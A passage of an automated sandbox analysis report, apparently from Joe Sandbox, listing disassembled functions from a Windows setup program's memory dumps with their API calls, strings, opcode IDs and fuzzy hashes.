                                                                                              • String ID: RegKey$RegValueName
                                                                                              • API String ID: 3842226755-3571311812
                                                                                              • Opcode ID: 219422e14320ed0cdd6ed8bc7c4d9e50b5497c06c72c0e8b153dbf2826f61373
                                                                                              • Instruction ID: fab00c884525f13edf696e09f8765c21b020165744ede492adeeb9fb6adb0e6a
                                                                                              • Opcode Fuzzy Hash: 219422e14320ed0cdd6ed8bc7c4d9e50b5497c06c72c0e8b153dbf2826f61373
                                                                                              • Instruction Fuzzy Hash: F3419F31A0124D9FCB20DFE8CA44ADEB7B5AF54318F140665E024E7780CB74EE09DBA2
                                                                                              Function 6C8D4265 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D426C
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8CA63E: __EH_prolog3.LIBCMT ref: 6C8CA645
                                                                                                • Part of subcall function 6C8CA63E: SysFreeString.OLEAUT32(?), ref: 6C8CA69B
                                                                                                • Part of subcall function 6C8D4397: __EH_prolog3.LIBCMT ref: 6C8D439E
                                                                                              • GetUserDefaultUILanguage.KERNEL32(6C8BA794,02F92298), ref: 6C8D4302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$DefaultFreeLanguageStringUser
                                                                                              • String ID: LCIDHint
                                                                                              • API String ID: 188276182-1583853939
                                                                                              • Opcode ID: 7eb9da7354138fc4b164d0bcb499aee1302ea9ce408cf6f5037516d5d5321466
                                                                                              • Instruction ID: cefc278e6af3706b4ec084436d0cc26a18adc6235416fbcfc5884d2719a6163c
                                                                                              • Opcode Fuzzy Hash: 7eb9da7354138fc4b164d0bcb499aee1302ea9ce408cf6f5037516d5d5321466
                                                                                              • Instruction Fuzzy Hash: 73416271A00209DFDB24CFA8CA84EDE77B5BF84318F254969E465AB790CB31ED05CB61
                                                                                              Function 6395E1AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadLocale.KERNEL32(00000000), ref: 6395E1FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread
                                                                                              • String ID: UiInfo.xml
                                                                                              • API String ID: 635194068-3938134364
                                                                                              • Opcode ID: b48fc81c5273e4e294b1f3e8dccb1c0b7cd7e8039dba30d6889422ceddea99e6
                                                                                              • Instruction ID: 68e7315e9ce397deab9a39d421881449ee4677bcd550a7945ec09ffb3acd731f
                                                                                              • Opcode Fuzzy Hash: b48fc81c5273e4e294b1f3e8dccb1c0b7cd7e8039dba30d6889422ceddea99e6
                                                                                              • Instruction Fuzzy Hash: 86417971A087409FD710DF68C448B5ABBE4EB8A728F004A1DF8A687390D735E944CF91
                                                                                              Function 6C8E6E46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E6E4D
                                                                                                • Part of subcall function 6C8E50B2: __EH_prolog3.LIBCMT ref: 6C8E50B9
                                                                                                • Part of subcall function 6C8E50B2: GetLastError.KERNEL32(00000000,LoadLibrary,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E5110
                                                                                                • Part of subcall function 6C8E50B2: __CxxThrowException@8.LIBCMT ref: 6C8E512D
                                                                                              • GetCommandLineW.KERNEL32(00000000,?), ref: 6C8E6E8F
                                                                                                • Part of subcall function 6C8C3E77: __EH_prolog3.LIBCMT ref: 6C8C3E7E
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                                • Part of subcall function 6C8E516F: FreeLibrary.KERNEL32(00000000,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E517C
                                                                                                • Part of subcall function 6C8E516F: LoadLibraryW.KERNEL32(?,?,?,6C8E50F8,00000000,0000000C,6C8E6E7F,00000000,?), ref: 6C8E5194
                                                                                                • Part of subcall function 6C91C0AA: _malloc.LIBCMT ref: 6C91C0C4
                                                                                                • Part of subcall function 6C90ABA1: __EH_prolog3.LIBCMT ref: 6C90ABA8
                                                                                                • Part of subcall function 6C90ABA1: GetProcAddress.KERNEL32(00000004,CreateClassFactory), ref: 6C90ABB8
                                                                                                • Part of subcall function 6C90ABA1: GetLastError.KERNEL32 ref: 6C90ABC6
                                                                                                • Part of subcall function 6C90ABA1: __CxxThrowException@8.LIBCMT ref: 6C90AC7D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$ErrorException@8LastLibraryThrow$AddressCommandFreeLineLoadProc_malloc
                                                                                              • String ID: passive
                                                                                              • API String ID: 304155978-1995439567
                                                                                              • Opcode ID: 5fe9b76c54f95009eddd1a9105631c8528b61025b7e958d782154aad814d0c03
                                                                                              • Instruction ID: cb4ecbc448005b2f40559b2e9137a6c8e1a7b928bf395864284745e9152dafea
                                                                                              • Opcode Fuzzy Hash: 5fe9b76c54f95009eddd1a9105631c8528b61025b7e958d782154aad814d0c03
                                                                                              • Instruction Fuzzy Hash: 1531CF7191534A9BDB20DFA8CA007DEBBB0AF29318F104D69D951A7F80CB70DA098B91
                                                                                              Function 6C8D57E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8D57EC
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • _memcpy_s.LIBCMT ref: 6C8D5887
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$_memcpy_s
                                                                                              • String ID: #(loc.
                                                                                              • API String ID: 1663610674-1630946291
                                                                                              • Opcode ID: 3a6eb39598482636c6af2c0ecd43eaff469841d480f0c2ca265542a0bf8875dc
                                                                                              • Instruction ID: bdc067426ef4d84ecd761a47f3a3e3b832b0b347ad2a210ed5d931d801b2ad6f
                                                                                              • Opcode Fuzzy Hash: 3a6eb39598482636c6af2c0ecd43eaff469841d480f0c2ca265542a0bf8875dc
                                                                                              • Instruction Fuzzy Hash: 5B31A2319042189FCF10DFA8C944ADE77A5EF10368F158A56E9249FF90C730EE49CB90
                                                                                              Function 6C8FEA74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8FEA7B
                                                                                              • GetComputerObjectNameW.SECUR32(00000007,00000000,6C8FFA6E), ref: 6C8FEAC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ComputerH_prolog3NameObject
                                                                                              • String ID: microsoft.com
                                                                                              • API String ID: 4212761916-499418652
                                                                                              • Opcode ID: 401195210c8d137675fcb7590bf0346c3a40d61c194cba3181c813bdfc5f7230
                                                                                              • Instruction ID: 7ccc36afa7ab22a816bed642cf9859085b7ad90d0b1cc8c5f20b7ca282d980a0
                                                                                              • Opcode Fuzzy Hash: 401195210c8d137675fcb7590bf0346c3a40d61c194cba3181c813bdfc5f7230
                                                                                              • Instruction Fuzzy Hash: A921F330A102199BCF14DFB8C9455FEB772AF2235CF204A2AD031A7BD0DB70D90A87A1
                                                                                              Function 6C8F7DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8F7DB7
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C8C4CB2: __EH_prolog3.LIBCMT ref: 6C8C4CB9
                                                                                                • Part of subcall function 6C8C395E: __EH_prolog3.LIBCMT ref: 6C8C3965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Operation Type$Operation: %s
                                                                                              • API String ID: 431132790-3288381836
                                                                                              • Opcode ID: ecec097de77c837f0f06d0305e70dc92ad26c2f0105a0166caa007ada11197ca
                                                                                              • Instruction ID: 792157d50396e2a840a83062fd49521549eba6cf9d57f194560a723bacf3f70d
                                                                                              • Opcode Fuzzy Hash: ecec097de77c837f0f06d0305e70dc92ad26c2f0105a0166caa007ada11197ca
                                                                                              • Instruction Fuzzy Hash: AD217C71900109DFCB10DBE8C945ADEBBB9AF25208F104459E140EBB51C774DA09CBA5
                                                                                              Function 6C8FFF21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcsnlen.LIBCMT ref: 6C8FFF54
                                                                                              • _memcpy_s.LIBCMT ref: 6C8FFF8A
                                                                                                • Part of subcall function 6C918E8C: __CxxThrowException@8.LIBCMT ref: 6C918EA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                                                              • String ID: OS Version Information
                                                                                              • API String ID: 31407445-551053750
                                                                                              • Opcode ID: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                                                              • Instruction ID: 487046e34aaf4732d3109e1e39a2e22182ec343c12656df8b06020cb1a77b692
                                                                                              • Opcode Fuzzy Hash: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                                                              • Instruction Fuzzy Hash: EA01C832604108AF9B14DF68CC45C9D77E9DBA53A4715852EF5249BB50EA30EA15CB90
                                                                                              Function 6C8E531E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8E5325
                                                                                                • Part of subcall function 6C918AFC: _wcsnlen.LIBCMT ref: 6C918B0C
                                                                                              • DeleteFileW.KERNEL32(?,00000010,HFI,00000000,?,6C8BAB18,00000004,6C90A448,38D98A99,38D98A99,?,?,6C8F4B23), ref: 6C8E5399
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                                                              • String ID: HFI
                                                                                              • API String ID: 1332513528-686494941
                                                                                              • Opcode ID: c2beb689c26f894be4aac4a8ea516b1060af238c6b0735193d2d588055861696
                                                                                              • Instruction ID: 8b6b3c1e79f3059867542bd2c67298990e00dde7ce0f7a80e5a6b22987e9726f
                                                                                              • Opcode Fuzzy Hash: c2beb689c26f894be4aac4a8ea516b1060af238c6b0735193d2d588055861696
                                                                                              • Instruction Fuzzy Hash: 6611E5313102089FC7189FB8C9416EEB7A1AF3631CB114A26E4619BF94D770D918A694
                                                                                              Function 6C90356C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C903573
                                                                                                • Part of subcall function 6C8C579B: _memset.LIBCMT ref: 6C8C57CA
                                                                                                • Part of subcall function 6C8C579B: GetVersionExW.KERNEL32 ref: 6C8C57DF
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 6C8C57F5
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 6C8C57FD
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000001,?,00000001,00000001), ref: 6C8C5805
                                                                                                • Part of subcall function 6C8C579B: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000001,?,00000020,00000001,?,00000001,00000001), ref: 6C8C580D
                                                                                                • Part of subcall function 6C8C579B: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C8C5818
                                                                                              Strings
                                                                                              • CSDReleaseType, xrefs: 6C9035CC
                                                                                              • SYSTEM\CurrentControlSet\Control\Windows, xrefs: 6C9035E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConditionMask$Version$H_prolog3InfoVerify_memset
                                                                                              • String ID: CSDReleaseType$SYSTEM\CurrentControlSet\Control\Windows
                                                                                              • API String ID: 3830908078-406884543
                                                                                              • Opcode ID: abc5debcbec999d05dbea20b07a356bffca31a413b1fb5969bf21aa21eae9634
                                                                                              • Instruction ID: a37d1a941a8759d7abd1fd270c2ac11f00545e31b7bd071dd9d8095da1a3595f
                                                                                              • Opcode Fuzzy Hash: abc5debcbec999d05dbea20b07a356bffca31a413b1fb5969bf21aa21eae9634
                                                                                              • Instruction Fuzzy Hash: 1701A5B2D101286BDB148F28C912BE93694BB11398F064566FD69EB741C339DA04DA91
                                                                                              Function 6C901602 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,6C8FFA6E,?,?,?,?,?,?,6C9034F1,6C8FFA6E,000000FF), ref: 6C901637
                                                                                              • GetLastError.KERNEL32(?,6C8FFA6E,?,?,?,?,?,?,6C9034F1,6C8FFA6E,000000FF,?,?,00000738,6C8FFA6E,?), ref: 6C901647
                                                                                                • Part of subcall function 6C8C7479: __EH_prolog3.LIBCMT ref: 6C8C7480
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskErrorFreeH_prolog3LastSpace
                                                                                              • String ID: GetDiskFreeSpaceEx
                                                                                              • API String ID: 3776785849-3355056173
                                                                                              • Opcode ID: 5061ce2453e4d358babcbe9a7c1988031c4ce2d6c3d78e680ab1e382c21b48a5
                                                                                              • Instruction ID: cc8be270c55f0d0c878d6c231fc3e7586119d473eb6042c8101d68fc509c9baf
                                                                                              • Opcode Fuzzy Hash: 5061ce2453e4d358babcbe9a7c1988031c4ce2d6c3d78e680ab1e382c21b48a5
                                                                                              • Instruction Fuzzy Hash: 120116B6A00219FB8B00DFD9D9458EEBBB9EB99714F114459E905B3200D770AB09CBD0
                                                                                              Function 6C8FEC5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8FEC61
                                                                                                • Part of subcall function 6C8F3B2B: __EH_prolog3.LIBCMT ref: 6C8F3B32
                                                                                                • Part of subcall function 6C8F3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,6C8FEC79,?,?), ref: 6C8F3BC9
                                                                                                • Part of subcall function 6C902C16: PathFileExistsW.SHLWAPI(00000000), ref: 6C902CA8
                                                                                                • Part of subcall function 6C902C16: __CxxThrowException@8.LIBCMT ref: 6C902CE7
                                                                                                • Part of subcall function 6C902C16: CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C902D19
                                                                                                • Part of subcall function 6C902C16: SetFileAttributesW.KERNEL32(?,00000080), ref: 6C902D32
                                                                                              • InitializeCriticalSection.KERNEL32(?,?,?,.html,00000001,00000000,6C8F747C,00000000,00000000,?,?,?,?,?,?,?), ref: 6C8FECBB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CriticalH_prolog3InitializeSection$AttributesCopyException@8ExistsPathThrow
                                                                                              • String ID: .html
                                                                                              • API String ID: 4277916732-2179875201
                                                                                              • Opcode ID: 8d5bd68876e84e7a45ace5caf358e479be5ae864fb2c1b81a90114efe5bded9e
                                                                                              • Instruction ID: fdd3975b641f8fd1a58fe311d55a9b5d931ca139dff5a594d34a911f966f847f
                                                                                              • Opcode Fuzzy Hash: 8d5bd68876e84e7a45ace5caf358e479be5ae864fb2c1b81a90114efe5bded9e
                                                                                              • Instruction Fuzzy Hash: 22F0A935600246EBDB05EBA486897DCB7A57F3430CF5084589504ABF40CB74EE1DE7A2
                                                                                              Function 63956615 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 63956636
                                                                                              • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,639572CF), ref: 63956648
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create
                                                                                              • String ID: tooltips_class32
                                                                                              • API String ID: 870168347-1918224756
                                                                                              • Opcode ID: 5a6efc6569761212c73502d48a3aff133ed62b83b9d4a9ea0cc79018be0fb146
                                                                                              • Instruction ID: 53cf804df0703340e8a56bad5c8d67c0c329da9e6e203c722786b07cd529638a
                                                                                              • Opcode Fuzzy Hash: 5a6efc6569761212c73502d48a3aff133ed62b83b9d4a9ea0cc79018be0fb146
                                                                                              • Instruction Fuzzy Hash: BFE04CB15471317EE6706A5AAC0CFE76E5CEF476B4F214214792CE6181D6205910CBF4
                                                                                              Function 6C90A1E6 Relevance: 4.7, APIs: 3, Instructions: 225COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C90A1ED
                                                                                              • GetCurrentProcessId.KERNEL32(00000020,6C8E53D9,00000000,?,?,6C8F4B23), ref: 6C90A1FD
                                                                                                • Part of subcall function 6C8E5238: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000), ref: 6C8E5254
                                                                                                • Part of subcall function 6C8E5238: _memset.LIBCMT ref: 6C8E526E
                                                                                                • Part of subcall function 6C8E5238: Process32FirstW.KERNEL32(00000000,?), ref: 6C8E5288
                                                                                                • Part of subcall function 6C8E5238: CloseHandle.KERNEL32(00000000), ref: 6C8E52B7
                                                                                                • Part of subcall function 6C918EAB: _memcpy_s.LIBCMT ref: 6C918EFC
                                                                                                • Part of subcall function 6C8F8608: __wcsicoll.LIBCMT ref: 6C8F8626
                                                                                              • GetTempPathW.KERNEL32(00000104,00000000,6C8F4B23,6C8F4614,6C8F4B23,00000000,00000010,00000010,?,00000000,6C8F4614,?,?,6C8F4B23), ref: 6C90A415
                                                                                                • Part of subcall function 6C8E5238: Process32NextW.KERNEL32(00000000,0000022C), ref: 6C8E52A3
                                                                                                • Part of subcall function 6C918AFC: _wcsnlen.LIBCMT ref: 6C918B0C
                                                                                                • Part of subcall function 6C8E531E: __EH_prolog3.LIBCMT ref: 6C8E5325
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
